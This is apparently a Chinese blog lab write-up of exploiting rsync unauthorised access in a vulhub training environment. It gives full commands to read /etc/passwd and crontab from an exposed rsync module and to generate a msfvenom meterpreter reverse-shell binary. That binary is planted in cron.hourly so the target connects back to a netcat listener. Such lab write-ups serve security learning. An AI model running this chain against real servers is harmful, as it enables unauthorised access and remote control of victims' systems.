【vulhub靶场之rsync关】

最新推荐文章于 2024-10-12 13:30:00 发布
最新推荐文章于 2024-10-12 13:30:00 发布
阅读量1.2k 收藏 13
点赞数 22
分类专栏: Vulnhub靶场 未授权漏洞 文章标签: web安全 安全 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140938555
版权

一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞

nmap -p 873 --script rsync-list-modules 加IP地址

查看到是有漏洞的模块的

image-20240805155648842

二、使用rsync命令连接并读取文件

image-20240805160205714

查看src目录里面的信息。

image-20240805160717745

三、对系统中的敏感文件进行下载——/etc/passwd

执行命令:

rsync rsync://43.136.68.40:873/src/etc/passwd /home/kali/Desktop/

image-20240805181956106

查看下载下的文件

cat /home/kali/Desktop/passwd

image-20240805182157837

也可在桌面双击打开

image-20240805182307279

四、在本机使用命令创建一个phpinfo文件

随便往里面写一个文件测试一下,例如phpinfo.php,如下命令在kali创建一个文件。

 echo "" > phpinfo.php

将文件再上传到受害者,也就是靶场环境里。

rsync ./phpinfo.php rsync://43.136.68.40:873/src/home/

查看一下有没有写进去

rsync rsync://43.136.68.40:873/src/home/

成功写进去了文件。

image-20240805190256114

五、反弹shell

查看定时任务

rsync://43.136.68.40:873/src/etc/crontab

将文件下载下到kali

rsync rsync://43.136.68.40:873/src/etc/crontab /home/kali/Desktop
​

查看一下文件里面的内容,里面的大概意思就是每17分钟调用一次/etc/cron.hourly

image-20240805191157593

在kali机子上拉取一个shell文件

语法:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=自己攻击机的地址 lport=4444 --f elf -o shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.168.189.150 lport=4444 --f elf -o shell

image-20240805212012471

将shell文件提权

chmod 777 shell

六:将shell上传到目标靶机中

命令语句:

rsync -av /home/kali/Desktop/shell rsync://43.136.68.40:873/src/etc/cron.hourly

image-20240805213313658

七、开启kali监听端口

nc -lvvp 4444

等待17分钟后,查看监听到的信息,代表连接成功。

Mr.sloane
关注
专栏目录
vulhub漏洞复现58_rsync
weixin_44193247的博客
02-12 207
vulhub漏洞复现练习篇
Linux 命令之rsync命令详解
09-15
**rsync命令详解** `rsync` 是 Linux 系统中的一款强大且高效的文件和目录同步工具,它能够通过局域网(LAN)或广域网(WAN)快速同步多台主机之间的数据。rsync 的核心优势在于其采用的“rsync 算法”,该算法能仅...
测试rsync未授权访问漏洞及批量检测
m0_53073183的博客
01-31 931
rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。
docker之vulhub靶场环境搭建(Linux)
qq_50953689的博客
05-06 3011
首先安装pip: curl -s https://bootstrap.pypa.io/get-pip.py | python3 再安装docker: curl -s https://get.docker.com/ | sh 然后验证docker是否安装成功: docker version 安装docker-compose: pip install docker-compose 验证docker-compose是否安装成功: docker-compose version 需要从G
Vulhub靶场漏洞环境搭建
weixin_45965246的博客
09-17 247
由于《网络安全法》不断完善,我们也不能像前人那样直接在互联网上为所欲为。这样就委屈了我们这些小白新手们无从下手,没有实战怎能积累经验?于是,为了响应国家的号召诞生了很多靶场平台供我们练习,如果想进一步提升自己的技术也可参加一些具有影响力的CTF赛事。Vulhub收集了很多漏洞,也提供了利用方法,而且在github上是开源的,我们只需要找到相应的漏洞开启环境就可以练习。
Centos部署vulhub时所遇到的问题
Aevery的博客
03-07 1752
官方部署文档,直接使用几条命令即可方便快捷的部署漏洞靶场环境 Vulhub - Docker-Compose file for vulnerability environmenthttps://vulhub.org/#/docs/install-docker-compose/ 1、首先是网络问题,服务器直接使用GitHub下载因为某些原因,下载失败。使用官网文档中的docker加速器时在重启docker时出现docker启动报错 [root@localhost docker]# systemctl
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
Rsync未授权访问漏洞 *
starhei.zxy的博客
08-05 351
是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为。中搜索该资产语法如下并在Vulhub中开启靶场!且默认配置文件路径在。
Ubuntu20.04下部署vluhub漏洞靶场
七天
06-24 1314
文章目录一、安装curl二、安装Docker三、下载vluhub源码四、访问漏洞环境步骤 一、安装curl root@virtual-machine:~# apt install curl Reading package lists... Done Building dependency tree Reading state information... Done The following additional packages will be installed: libcurl4
rsync 未授权访问漏洞
weixin_45366453的博客
07-05 695
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。使用Vulfocus 漏洞威胁分析平台在线靶场测试: 利用定时任务反弹shell获取信息 .创建文件 上传文件 利用msf框架将想要测试的ip批量测试 参考链接 Vulhub - Docker-Compose file for vulnerability environment...
rsync
01-20
`rsync`是一款强大的文件同步工具,常用于在本地或远程之间进行增量备份。它能够高效地处理数据传输,因为它只复制自上次同步以来发生变化的文件部分,而不是整个文件。以下将详细介绍`rsync`的一些键特性、常用...
rsync rpm安装包
09-07
rsync rpm安装包
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 841
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-09 895
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
最新发布
2401_85027336的博客
10-12 579
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-11 1996
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全的全面指南
qq_42568323的博客
10-09 1039
网络安全是指保护计算机网络及其数据免受未经授权访问、攻击或破坏的过程。其目标是确保信息的机密性、完整性和可用性。
RHEL5中启用rsync服务与配置详解
在Red Hat Enterprise Linux 5 (RHEL5)系统上,rsync服务是一个强大的工具,用于在本地和远程计算机之间同步文件。RHEL5默认已经包含了rsync软件包,但为了启用rsync服务,我们需要进行一些基本的配置。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值